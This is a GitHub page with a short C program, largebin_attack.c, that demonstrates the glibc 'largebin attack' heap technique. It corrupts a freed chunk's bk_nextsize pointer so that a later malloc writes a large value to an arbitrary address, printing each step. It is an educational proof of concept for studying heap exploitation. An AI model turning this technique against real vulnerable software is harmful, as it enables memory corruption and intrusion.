-
Notifications
You must be signed in to change notification settings - Fork 23
/
largebin_attack.c
40 lines (30 loc) · 1.07 KB
/
largebin_attack.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
#include <stdio.h>
#include <stdlib.h>
#include <inttypes.h>
static uint64_t victim;
int main()
{
setbuf(stdout, 0);
setbuf(stderr, 0);
printf("You can use this technique to write a big number to arbitrary address\n");
char *p1, *p2, *p3;
printf("\n1. Create two chunk, and free the larger one into largebin list\n");
p1 = malloc(0x458);
malloc(0x18);
p2 = malloc(0x448);
malloc(0x18);
free(p1);
//trigger
malloc(0x600);
printf("Now the chunk %p is in largebin\n", p1);
printf("\n2. Free the smaller one into unsortedbin, and change chunk's bk_nextsize in largebin to &victim-0x20\n");
free(p2);
printf("Now the chunk %p is in unsortedbin\n", p2);
*(uint64_t*)(p1+0x18) = (uint64_t)(&victim)-0x20;
printf("\n3. Alloc a size not match the the chunk size in unsortedbin\n");
printf("It will trigger largebin attack, write a big number to victim\n");
printf("Before attack, victim's value: 0x%lx\n", victim);
malloc(0x68);
printf("After attack, victim's value: 0x%lx\n", victim);
return 0;
}